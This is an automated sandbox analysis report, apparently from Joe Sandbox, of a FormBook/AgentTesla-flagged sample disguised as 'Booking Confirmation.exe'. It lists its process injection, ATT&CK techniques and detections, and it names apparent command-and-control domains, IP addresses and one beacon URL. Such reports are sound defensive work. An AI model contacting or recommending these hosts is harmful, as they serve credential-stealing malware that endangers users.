            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000005.00000002.709997867.0000000001500000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.912607132.0000000004920000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.671285373.0000000003599000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.912770256.0000000004A80000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.709963590.00000000014D0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 5.2.Booking Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Booking Confirmation.exe.36e45e0.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.Booking Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Booking Confirmation.exe.3739600.2.raw.unpack, type: UNPACKEDPE

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000005.00000002.709997867.0000000001500000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.912607132.0000000004920000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.671285373.0000000003599000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.912770256.0000000004A80000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.709963590.00000000014D0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 5.2.Booking Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Booking Confirmation.exe.36e45e0.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.Booking Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Booking Confirmation.exe.3739600.2.raw.unpack, type: UNPACKEDPE

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation1Path InterceptionProcess Injection512Rootkit1Credential API Hooking1Security Software Discovery331Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemoryVirtualization/Sandbox Evasion14Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion14Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Disable or Modify Tools1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection512LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information31DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing13Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 356529 Sample: Booking Confirmation.exe Startdate: 23/02/2021 Architecture: WINDOWS Score: 100 32 www.merzigomusic.com 2->32 34 merzigomusic.com 2->34 42 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 11 other signatures 2->48 11 Booking Confirmation.exe 3 2->11         started        signatures3 process4 file5 30 C:\Users\...\Booking Confirmation.exe.log, ASCII 11->30 dropped 14 Booking Confirmation.exe 11->14         started        17 Booking Confirmation.exe 11->17         started        process6 signatures7 58 Modifies the context of a thread in another process (thread injection) 14->58 60 Maps a DLL or memory area into another process 14->60 62 Sample uses process hollowing technique 14->62 64 Queues an APC in another process (thread injection) 14->64 19 explorer.exe 14->19 injected process8 dnsIp9 36 buehne.cloud 81.169.149.11, 49759, 80 STRATOSTRATOAGDE Germany 19->36 38 www.localmoversuae.com 156.227.187.201, 49763, 80 POWERLINE-AS-APPOWERLINEDATACENTERHK Seychelles 19->38 40 2 other IPs or domains 19->40 50 System process connects to network (likely due to code injection or exploit) 19->50 23 chkdsk.exe 19->23         started        signatures10 process11 signatures12 52 Modifies the context of a thread in another process (thread injection) 23->52 54 Maps a DLL or memory area into another process 23->54 56 Tries to detect virtualization through RDTSC time measurements 23->56 26 cmd.exe 1 23->26         started        process13 process14 28 conhost.exe 26->28         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Booking Confirmation.exe33%ReversingLabsWin32.Trojan.AgentTesla
            Booking Confirmation.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            5.2.Booking Confirmation.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.sajatypeworks.comt0%URL Reputationsafe
            http://www.sajatypeworks.comt0%URL Reputationsafe
            http://www.sajatypeworks.comt0%URL Reputationsafe
            http://www.buehne.cloud/ffw/?MZg8=i2wbx/M7rrWGhnBeYdMUQ+oEsm11dU48NWkvE2U6RCUjjqrjMq6tqVdU8V2lO/H9m4oS&uTxXc=ojO0dJK0Hv0%Avira URL Cloudsafe
            http://www.sajatypeworks.coms0%Avira URL Cloudsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://en.w0%URL Reputationsafe
            http://en.w0%URL Reputationsafe
            http://en.w0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.founder.com.cn/cnE0%Avira URL Cloudsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.founder.com.cn/cn/0%URL Reputationsafe
            http://www.founder.com.cn/cn/0%URL Reputationsafe
            http://www.founder.com.cn/cn/0%URL Reputationsafe
            http://www.founder.com.cn/cnht0%Avira URL Cloudsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
